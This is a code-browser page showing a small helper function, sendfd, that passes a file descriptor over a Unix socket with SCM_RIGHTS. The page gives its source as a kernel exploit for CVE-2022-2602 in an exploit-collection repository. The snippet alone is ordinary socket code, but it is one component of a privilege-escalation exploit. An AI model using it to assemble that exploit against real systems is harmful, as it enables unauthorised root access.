MCPcopy Create free account
hub / github.com/bsauce/kernel-exploit-factory / sendfd

Function sendfd

CVE-2022-2602/exploit/exploit.c:80–96  ·  view source on GitHub ↗

send fd descriptor

Source from the content-addressed store, hash-verified

78struct iovec iov[12];
79// send fd descriptor
80int sendfd(int s, int fd) {
81 struct msghdr msg;
82 char buf[4096];
83 struct cmsghdr *cmsg;
84 int fds[1] = { fd };
85 memset(&msg, 0, sizeof(msg));
86 memset(buf, 0, sizeof(buf));
87 msg.msg_control = buf;
88 msg.msg_controllen = sizeof(buf);
89 cmsg = CMSG_FIRSTHDR(&msg);
90 cmsg->cmsg_level = SOL_SOCKET;
91 cmsg->cmsg_type = SCM_RIGHTS; // send fd
92 cmsg->cmsg_len = CMSG_LEN(sizeof(fds));
93 memcpy(CMSG_DATA(cmsg), fds, sizeof(fds));
94 msg.msg_controllen = CMSG_SPACE(sizeof(fds));
95 sendmsg(s, &msg, 0);
96}
97
98int io_uring_setup2(int r, void *p) {
99 return syscall(__NR_io_uring_setup, r, p);

Callers 1

mainFunction · 0.85

Calls

no outgoing calls

Tested by

no test coverage detected